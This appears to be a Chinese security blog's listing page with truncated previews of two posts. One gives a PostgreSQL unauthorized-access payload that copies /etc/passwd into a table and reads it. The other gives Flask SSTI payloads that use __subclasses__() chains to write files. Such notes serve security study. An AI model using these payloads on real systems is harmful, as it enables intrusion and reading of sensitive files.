安全
kimojinmmp
这个作者很懒,什么都没留下…
展开
-
postgresql未授权访问
pyload: DROP TABLE if EXISTS wooyun; CREATE TABLE wooyun(t TEXT); COPY wooyun FROM '/etc/passwd'; SELECT * FROM wooyun limit 1 offset 0;原创 2022-04-03 13:42:28 · 3583 阅读 · 0 评论 -
flask ssti
1.漏洞成因: 2.漏洞防御: 3.漏洞利用: subclasses()[59]:是找到重载过的__init__类(在获取初始化属性后,带wrapper的说明没有重载,寻找不带warpper的) (1)''.__class__.__mro__[2].__subclasses__()[40]("/root/桌面/test.txt", "a").write("123") (2)''.__class__.__mro__[2].__subclasses__([59].__init__.__globals__['_原创 2022-04-03 13:37:18 · 2173 阅读 · 0 评论